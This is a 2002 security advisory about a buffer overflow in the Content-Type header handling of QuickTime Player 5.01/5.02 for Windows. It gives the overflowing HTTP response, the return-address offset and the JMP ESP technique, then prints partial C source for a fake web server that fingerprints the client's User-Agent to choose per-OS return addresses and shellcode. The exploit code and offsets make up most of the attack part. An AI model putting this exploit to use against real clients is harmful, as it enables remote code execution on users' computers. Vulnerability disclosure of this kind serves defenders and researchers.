Apple QuickTime Player "Content-Type" Buffer Overflow
9 Feb. 2002
Summary
QuickTime Player can get the file that is published on web server and play it, QuickTime Player overflows when a web server sends an HTTP response that contains a long "Content-Type". This buffer overflow overwrites the local buffer, which is then executed on the client host.
Credit:
The information has been provided by UNYUN.
Vulnerable systems:
* QuickTime Player 5.01 for Windows (Japanese)
* QuickTime Player 5.02 for Windows (Japanese)
Details:
QuickTime Player overflows when it connects to the web server that sends the following HTTP response.
HTTP/1.1 200 OK
Date: Wed, 06 Feb 2002 06:56:30 GMT
Server: Apache/1.3.19
Last-Modified: Tue, 15 May 2001 13:37:51 GMT
ETag: "1e001d-7b5-3b01312f"
Accept-Ranges: bytes
Content-Length: 1973
Content-Type: aaaaaaaaaaaa.. long string ..aaaaaaaaaaaaa
You can confirm the buffer overflow if you specify long string (about 500bytes) at the line of Content-Type. RET address is stored in offset 456, if the address of JMP ESP code is specified to RET address, the code written in the buffer for Content-Type is executed.
You can create a "mov" file that links to fake webserver by creating the following file structure:
Furthermore, QuickTime Player sets the version of QuickTime Player and OS to User-Agent as follows.
User-Agent: QuickTime (qtver=5.0.2;os=Windows NT 5.0Service Pack 2)
Exploit code can send EIP and egg code which are appropriate for environment of connected client.
Avoidance:
If you use Internet Explorer, you can avoid this problem if ActiveX is disabled. If you open "mov" file by QuickTime Player, you must check the mov file manually for whether a hyperlink is included. If hyperlink is specified in mov file, you must check that the "Content-Type" which is sent from web server is not of a malicious nature.
Sample code:
This code provides a TCP service at port 2222. This faked web server checks User-Agent which is sent by QuickTime Player and sets the appropriate EIP and egg code (for WindowsXP (home)/2000 (pro)/98 (SE)).
/*======================================================================
Apple QuickTimePlayer 5.02/5.01 Exploit
for Windows XP Home edition
Windows2000 Professional (Service Pack 2)
Windows98 Second Edition
The Shadow Penguin Security (http://www.shadowpenguin.org)
Written by UNYUN (unyun@shadowpenguin.org)
=======================================================================
*/
#include <windows.h>
#include <windowsx.h>
#include <stdio.h>
#include <winsock.h>
// Recv request
if ((r=recv(sock,recvbuf,sizeof(recvbuf)-1,0))==SOCKET_ERROR){
printf("Can not recv packet\n");
return(0);
}
recvbuf[r]='\0';
printf("---request------------------------------\n");
printf("%s\n",recvbuf);
printf("----------------------------------------\n");
if ((p=strstr(recvbuf,"User-Agent:"))==NULL){
printf("Can not select\n");
printf("%s\n",recvbuf);
exit(1);
}
if ((q=strchr(p,'\r'))!=NULL) *q='\0';
if ((qtver=strstr(p,"qtver="))==NULL){
printf("Version is not written in User-Agent\n");
printf("%s\n",p);
exit(1);
}
qtver+=6;
if ((q=strchr(qtver,';'))!=NULL) *q='\0';
printf("Client version = '%s'\n",qtver);
q++;
if ((p=strchr(q,')'))!=NULL) *p='\0';
if ((os=strstr(q,"os="))==NULL){
printf("OS name is not written in User-Agent\n");
printf("%s\n",q);
exit(1);
}
os+=3;
printf("Client OS = '%s'\n",os);
if (!strcmp(os,UA_XPHOME)){
eip=RETADR_XPhome;
egg=egg_XPhome;
printf("Target = WindowsXp Home\n");
}else if (!strcmp(os,UA_2000PRO)){
eip=RETADR_2000pro;
egg=egg_2000pro;
printf("Target = Windows2000 Professional (SP2)\n");
}else if (!strcmp(os,UA_98SE)){
eip=RETADR_98SE;
egg=egg_98se;
printf("Target = Windows98 Second Edition\n");
}else{
eip=RETADR_2000pro;
egg=egg_2000pro;
printf("Target = Unknown.\n");
}
